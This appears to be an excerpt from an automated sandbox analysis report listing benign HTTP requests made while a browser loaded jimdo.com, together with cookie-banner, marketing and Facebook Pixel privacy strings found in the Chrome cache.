Source: global traffic	HTTP traffic detected: GET /session/1px.png?settingsId=k1JwB2Dk_ HTTP/1.1Host: app.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /feature-flags?shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635&custom=%7B%22language%22%3A%22en%22%2C%22isMobileLayout%22%3Afalse%2C%22jimdoApp%22%3A%22lp%22%2C%22isAffiliate%22%3Afalse%7D HTTP/1.1Host: feature-flags-proxy.prod.jimdo.systemsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.jimdo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ui/v/3.12.1/GdprCmpController.3f26e812.js HTTP/1.1Host: web.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /latest/1/cmp/en/GDPR/k1JwB2Dk_/263.83.372/263.83.372?isOutsideEu=true HTTP/1.1Host: v1.api.service.cmp.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /openid/authorize?client_id=lc-website&redirect_uri=https://www.jimdo.com/oidc-silent-callback/&response_type=id_token&scope=openid%20email%20profile&state=256b7a98da7746ca9ff5752a1b68e60e&nonce=7640dc06b94045b186e893193bb13880&prompt=none HTTP/1.1Host: account.e.jimdo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635; jLang=en; _dd_s=logs=0&expire=1713462876327&lock=060b6a1f-b6e8-420b-976a-387b96d51465
Source: global traffic	HTTP traffic detected: GET /app/price/index/country HTTP/1.1Host: a.jimdo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.jimdo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /feature-flags?shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635&custom=%7B%22language%22%3A%22en%22%2C%22isMobileLayout%22%3Afalse%2C%22jimdoApp%22%3A%22lp%22%2C%22isAffiliate%22%3Afalse%7D HTTP/1.1Host: feature-flags-proxy.prod.jimdo.systemsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ui/v/3.12.1/UcGdprCmpView.5cabf3a0.js HTTP/1.1Host: web.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /app/price/index/country HTTP/1.1Host: a.jimdo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635; jLang=en; _dd_s=logs=0&expire=1713462876327&lock=cd983e3e-7e07-43a9-8539-092df37cdaa9
Source: global traffic	HTTP traffic detected: GET /latest/i18n/en/GDPR/k1JwB2Dk_/263.83.372 HTTP/1.1Host: v1.api.service.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.jimdo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /latest/i18n/en/GDPR/k1JwB2Dk_/263.83.372 HTTP/1.1Host: v1.api.service.cmp.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uct?v=2&sid=k1JwB2Dk_&t=1&abv=&r=https%3A%2F%2Fwww.jimdo.com%2F%3Futm_source%3Ddol-doc-36%2520en-US%26utm_medium%3Dfooter%2520ad%26utm_campaign%3Downads%2520webview&cb=1713461979163 HTTP/1.1Host: uct.service.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uct?v=2&sid=k1JwB2Dk_&t=1&abv=&r=https%3A%2F%2Fwww.jimdo.com%2F%3Futm_source%3Ddol-doc-36%2520en-US%26utm_medium%3Dfooter%2520ad%26utm_campaign%3Downads%2520webview&cb=1713461979163 HTTP/1.1Host: uct.service.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /.well-known/web-identity HTTP/1.1Host: google.comConnection: keep-aliveAccept: application/jsonSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: webidentityUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /.well-known/web-identity HTTP/1.1Host: www.google.comConnection: keep-aliveAccept: application/jsonSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: webidentityUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uct?v=2&sid=k1JwB2Dk_&t=1&abv=&r=https%3A%2F%2Fwww.jimdo.com%2F%3Futm_source%3Ddol-doc-36%2520en-US%26utm_medium%3Dfooter%2520ad%26utm_campaign%3Downads%2520webview&cb=1713461994702 HTTP/1.1Host: uct.service.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /feature-flags?shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635&custom=%7B%22language%22%3A%22en%22%2C%22isMobileLayout%22%3Afalse%2C%22jimdoApp%22%3A%22lp%22%2C%22isAffiliate%22%3Afalse%7D HTTP/1.1Host: feature-flags-proxy.prod.jimdo.systemsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.jimdo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"2495-u8KIc9+qb9mJNCMKah/oanTPalo"
Source: global traffic	HTTP traffic detected: GET /uct?v=2&sid=k1JwB2Dk_&t=1&abv=&r=https%3A%2F%2Fwww.jimdo.com%2F%3Futm_source%3Ddol-doc-36%2520en-US%26utm_medium%3Dfooter%2520ad%26utm_campaign%3Downads%2520webview&cb=1713461994702 HTTP/1.1Host: uct.service.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /feature-flags?shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635&custom=%7B%22language%22%3A%22en%22%2C%22isMobileLayout%22%3Afalse%2C%22jimdoApp%22%3A%22lp%22%2C%22isAffiliate%22%3Afalse%7D HTTP/1.1Host: feature-flags-proxy.prod.jimdo.systemsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"2495-u8KIc9+qb9mJNCMKah/oanTPalo"
Source: global traffic	HTTP traffic detected: GET /openid/authorize?client_id=lc-website&redirect_uri=https://www.jimdo.com/oidc-silent-callback/&response_type=id_token&scope=openid%20email%20profile&state=256b7a98da7746ca9ff5752a1b68e60e&nonce=7640dc06b94045b186e893193bb13880&prompt=none HTTP/1.1Host: account.e.jimdo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635; jLang=en; _dd_s=logs=0&expire=1713462876327&lock=cd983e3e-7e07-43a9-8539-092df37cdaa9
Source: global traffic	HTTP traffic detected: GET /app/price/index/country HTTP/1.1Host: a.jimdo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.jimdo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /.well-known/web-identity HTTP/1.1Host: google.comConnection: keep-aliveAccept: application/jsonSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: webidentityUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /app/price/index/country HTTP/1.1Host: a.jimdo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635; jLang=en; _dd_s=logs=0&expire=1713462876327&lock=cd983e3e-7e07-43a9-8539-092df37cdaa9
Source: global traffic	HTTP traffic detected: GET /.well-known/web-identity HTTP/1.1Host: www.google.comConnection: keep-aliveAccept: application/jsonSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: webidentityUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_128.2.dr	String found in binary or memory: we make it easy for you. Create your online store with ease - we do not charge fees on your sales. Or get your service running with your booking tool.","title":"The easy way to get your first transaction"},"community":{"linkHref":"https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2Fgroups%2F551693728784465%2F%3Fref%3Dshare%26paipv%3D0%26eav%3DAfZ416FHK-1vGrRMXO0KFWEc6dIc0LztRgMYPAuusG8HTZr_5dY-ohooTUxZ75VvJkI","linkLabel":"Join the community","text":"The Jimdo Community is a place where you can benefit from the experiences of other entrepreneurs. Get answers to all your questions and take your business to the next level.","title":"Your support from other business owners"},"domains":{"linkHref":"https://www.jimdo.com/website/domain/","linkLabel":"Get your domain now","text":"Your website appears professional and trustworthy: with a domain including HTTPS encryption, hosting, and the added benefit of being more easily found through search engines like Google.","title":"Your own domain in just three clicks"},"website":{"buttonLabel":"Get started","linkHref":"https://www.jimdo.com/website/how-to-create/","linkLabel":"Learn more","text":"Build your professional website with the power of the Jimdo Artificial Intelligence. Whatever you need for your business and website, our AI simplifies it, speeds it up and knows exactly what you need to be successful.","title":"Your website without all the bells and whistles but with everything you need"}},"TeaserSplit":{"shop-teaser":{"buttonHref":"/pricing/onlineshop/","buttonLabel":"Let's get started","imageAlt":"Man prepares a shipment from his online store","linkHref":"/website/online-store/","linkLabel":"How to create an online store","listItems":[{"text":"No transaction fees (your products, your profit)"},{"text":"Offer shipping and local pickup options"},{"text":"Book appointments right on your site"},{"text":"Take payments via PayPal or Stripe"},{"text":"Manage all your orders in one place"},{"text":"Sell on Instagram and Facebook"},{"text":"Boost your store with sales & discounts"}],"text":"Create an independent online store equals www.facebook.com (Facebook)
Source: chromecache_155.2.dr	String found in binary or memory: d like to find out more about the cookies we use and set your individual cookie preferences, please review our [{cookiesPolicyPageName}]({cookiesPolicyLink}).",cmsCookieBannerText2020June:"This website uses cookies. You can find more information on the types of cookies used as well as enable individual cookies in their respective categories. You can adjust your settings at any time through the link in the footer of this website.",cmsCookieBannerTiktokPostCookiePolicyUrl:"https://www.tiktok.com/legal/cookie-policy?lang=en",cmsCookieBannerTiktokPostPrivacyPolicy:"https://www.tiktok.com/legal/privacy-policy-eea?lang=de",cmsCookieBannerTitle:"Cookie Policy",cmsCookieBannerToggleButtonEnableAllText:"Enable all",cmsCookieBannerTumblrCookiePolicyUrl:"https://www.tumblr.com/privacy",cmsCookieBannerTumblrPrivacyPolicy:"https://www.tumblr.com/privacy",cmsCookieBannerTwitchVideoCookiePolicyUrl:"https://www.twitch.tv/p/de-de/legal/cookie-notice/",cmsCookieBannerTwitchVideoPrivacyPolicy:"https://www.twitch.tv/p/de-de/legal/privacy-notice/",cmsCookieBannerTwitterPostCookiePolicyUrl:"https://help.twitter.com/en/rules-and-policies/twitter-cookies",cmsCookieBannerTwitterPostPrivacyPolicy:"https://twitter.com/en/privacy",cmsCookieBannerTypeFormCookiePolicyUrl:"https://admin.typeform.com/to/dwk6gt/?typeform-source=www.typeform.com",cmsCookieBannerTypeFormPrivacyPolicy:"https://admin.typeform.com/to/dwk6gt/?typeform-source=www.typeform.com",cmsCookieBannerVimeoCookiePolicyUrl:"https://vimeo.com/cookie_policy",cmsCookieBannerVimeoDescription:"This cookie is used to unlock and display Vimeo content on this website. \n\nProvider: Vimeo, Inc., 555 West 18th Street, New York, New York 10011 USA\n\nCookie Names and Lifetimes: muxData (Lifetime: 20 years), _ssid (Lifetime: 10 years), language (Lifetime: 10 years), vimeo_gdpr_optin (Lifetime: 10 years), player (Lifetime: 1 year), _qca (Lifetime: 3 months), continuous_play_v3 (Lifetime: 2 months), vuid (Lifetime: 2 years), _derived_epik (Lifetime: 2 months), _ga (Lifetime: 2 years)",cmsCookieBannerVimeoPrivacyPolicyUrl:"https://vimeo.com/privacy",cmsCookieBannerVimeoTitle:"Vimeo",cmsCookieBannerVimeoVideoCookiePolicyUrl:"https://vimeo.com/cookie_policy",cmsCookieBannerVimeoVideoPrivacyPolicy:"https://vimeo.com/privacy",cmsCookieBannerWebStoreStateDescription:"Essential local storage for the correct functioning of this store and for the continued saving of the visitor equals www.twitter.com (Twitter)
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: ll get access to:","title":"Create your\nJimdo account"},"socialButtonList":{"facebook":{"href":"https://www.facebook.com/Jimdo","label":"Visit Jimdo equals www.facebook.com (Facebook)
Source: chromecache_170.2.dr	String found in binary or memory: return b}oC.H="internal.enableAutoEventOnTimer";var gc=ia(["data-gtm-yt-inspected-"]),qC=["www.youtube.com","www.youtube-nocookie.com"],rC,sC=!1; equals www.youtube.com (Youtube)
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: s Facebook page"},"instagram":{"href":"https://www.instagram.com/jimdo_global/","label":"Visit Jimdo equals www.facebook.com (Facebook)
Source: chromecache_155.2.dr	String found in binary or memory: s IP address, and operating system info.",cmsCookieBannerIFrameAppTypeFormDescription:"Typeform is for building online forms and surveys. To provide this service, it collects the data that the website visitor enters into the online form or survey, as well as the date and time of their visit, duration, IP address, and email address. Cookie Name(s) and Lifetimes: __cf_bm(lifetime: 30mins), attribution_user_id(lifetime: 1 year)",cmsCookieBannerIFrameAppVimeoVideoDescription:"This cookie is used to unlock and display Vimeo content on this website. Provider: Vimeo, Inc., 555 West 18th Street, New York, New York 10011 USA Cookie Names and Lifetimes: muxData (Lifetime: 20 years), _ssid (Lifetime: 10 years), language (Lifetime: 10 years), vimeo_gdpr_optin (Lifetime: 10 years), player (Lifetime: 1 year), _qca (Lifetime: 3 months), continuous_play_v3 (Lifetime: 2 months), vuid (Lifetime: 2 years), _derived_epik (Lifetime: 2 months), _ga (Lifetime: 2 years)",cmsCookieBannerIFrameAppYoutubeVideoDescription:'These cookies are set via embedded YouTube videos. They register anonymous statistical data, e.g. how often the video is shown and which settings are used for playback. No personal data is collected unless the user logs in to their Google Account. In this case, their selections are associated with their account, such as when they click "Like" on a video. \nCookie Name(s) and Lifetimes: YSC(valid for one session), secure-HSID,(lifetime:2 months) Secure-SSID(lifetime:2 months), Secure-APSID(lifetime:2 months), VISITORINFO1LIVE(lifetime:5 months), SIDCC(lifetime: 1 year), LOGIN_INFO(lifetime: 2 years),PREF(lifetime: 2 years), SID(lifetime: 2 years), _Secure-3PSID(lifetime: 2 years), HSID(lifetime: 2 years), SSID(lifetime: 2 years), APISID(lifetime: 2 years), SAPISID(lifetime: 2 years), _Secure-3PAPISID(lifetime: 2 years), Consent (lifetime: 28 years).',cmsCookieBannerInstagramPostCookiePolicyUrl:"https://help.instagram.com/1896641480634370?ref=ig",cmsCookieBannerInstagramPostPrivacyPolicy:"https://help.instagram.com/519522125107875",cmsCookieBannerItunesCookiePolicyUrl:"https://www.apple.com/legal/privacy/de-ww/cookies/",cmsCookieBannerItunesDescription:"This cookie is used to unlock and display Apple Music content on this website.\n\nProvider: Apple Inc., Infinite Loop, Cupertino, CA 95014 USA.\n\nCookie Names and Lifetime:_lost-sound_session (Lifetime: session), JESSIONID (Lifetime: Session)",cmsCookieBannerItunesPrivacyPolicyUrl:"https://www.apple.com/legal/privacy/",cmsCookieBannerItunesTitle:"iTunes",cmsCookieBannerPaypalCookiePolicyUrl:"https://www.paypal.com/ie/webapps/mpp/ua/cookie-full",cmsCookieBannerPaypalDescription:"This is essential in order to enable payments powered by Paypal via this store. \n\nProvider:PayPal (Europe) S. equals www.youtube.com (Youtube)
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: s Twitter page"},"youTube":{"href":"https://www.youtube.com/user/jimdo","label":"Visit Jimdo equals www.twitter.com (Twitter)
Source: chromecache_146.2.dr, chromecache_128.2.dr	String found in binary or memory: s Twitter page"},"youTube":{"href":"https://www.youtube.com/user/jimdo","label":"Visit Jimdo equals www.youtube.com (Youtube)
Source: chromecache_215.2.dr	String found in binary or memory: s device as listed below.","title":"Stored Information","url":""},"consentHistoryContent":{"title":"History","decisionHeader":"Decision","dateHeader":"Date","yes":"yes","yesImplicit":"yes (website default)","no":"no","noImplicit":"no (website default)","noHistory":"Sorry, we could not load the required information.","serviceId":"nB9FrU5TO"}}},"2fGlUzLWYMeDj5":{"description":"This is a Tracking technology offered by Facebook and used by other Facebook services. It is used to track interactions of visitors with websites (\"Events\") after they have clicked on an ad placed on Facebook or other services provided by Meta (\"Conversion\").\n","id":"2fGlUzLWYMeDj5","legalBasis":["Art. 6 para. 1 s. 1 lit. a GDPR"],"name":"Facebook Pixel","details":{"genericContent":[{"id":"description","description":"This is a Tracking technology offered by Facebook and used by other Facebook services. It is used to track interactions of visitors with websites (\"Events\") after they have clicked on an ad placed on Facebook or other services provided by Meta (\"Conversion\").\n","title":"Description of Service"},{"body":{"type":"text","value":"4 Grand Canal Square, Grand Canal Harbour, Dublin, D02, Ireland"},"id":"processingCompany","description":"Meta Platforms Ireland Ltd.","title":"Processing Company"},{"body":{"type":"link","value":"https://www.facebook.com/help/contact/1650115808681298"},"id":"dataProtectionOfficer","description":"Below you can find the email address of the data protection officer of the processing company.","title":"Data Protection Officer of Processing Company"},{"body":{"type":"tag","value":[{"label":"Analytics","id":"dp0"},{"label":"Marketing","id":"dp1"},{"label":"Retargeting","id":"dp2"},{"label":"Advertisement","id":"dp3"},{"label":"Conversion Tracking","id":"dp4"},{"label":"Personalisation","id":"dp5"}]},"description":"This list represents the purposes of the data collection and processing.","id":"dataPurposes","title":"Data Purposes"},{"body":{"type":"tag","value":[{"label":"Cookies","id":"tu0"},{"label":"Pixel","id":"tu1"}]},"description":"This list represents all technologies this service uses to collect data. Typical technologies are Cookies and Pixels that are placed in the browser.","id":"techonologiesUsed","title":"Technologies Used"},{"body":{"type":"tag","value":[{"label":"Ads viewed","id":"dc0"},{"label":"Content viewed","id":"dc1"},{"label":"Device information","id":"dc2"},{"label":"Geographic location","id":"dc3"},{"label":"HTTP-header","id":"dc4"},{"label":"Interactions with advertisement, services, and products","id":"dc5"},{"label":"IP address","id":"dc6"},{"label":"Items clicked","id":"dc7"},{"label":"Marketing information","id":"dc8"},{"label":"Pages visited","id":"dc9"},{"label":"Pixel ID","id":"dc10"},{"label":"Referrer URL","id":"dc11"},{"label":"Usage data","id":"dc12"},{"label":"User behaviour","id":"dc13"},{"label":"Facebook cookie information","id":"dc14"},{"label":"Facebook user ID","id":"dc15"},{"label":"Usage/click
Source: chromecache_189.2.dr, chromecache_215.2.dr	String found in binary or memory: s interactions tracked on websites will not be stored longer than for two years. However, the data will be deleted as soon as they are no longer needed for the processing purposes.","id":"rp0"}]},"description":"The retention period is the time span the collected data is saved for the processing purposes. The data needs to be deleted as soon as it is no longer needed for the stated processing purposes.","id":"retentionPeriod","title":"Retention Period"},{"body":{"type":"tag","value":[{"label":"Meta Platforms Ireland Ltd., Meta Platforms Inc. ","id":"dr0"}]},"description":"In the following the recipients of the data collected are listed.","id":"dataRecipients","title":"Data Recipients"},{"body":{"type":"link","value":"https://www.facebook.com/privacy/explanation"},"id":"privacyPolicy","title":"Click here to read the privacy policy of the data processor"},{"body":{"type":"list","value":[{"label":"Maximum age of cookie storage: 1 year","id":"si0"}]},"description":"Below you can see the longest potential duration for storage on a device, as set when using the cookie method of storage and if there are any other methods used.","id":"storageInformation","title":"Storage Information"}],"storedInfoContent":{"id":"storedInformation","description":"This service uses different means of storing information on a user equals www.facebook.com (Facebook)
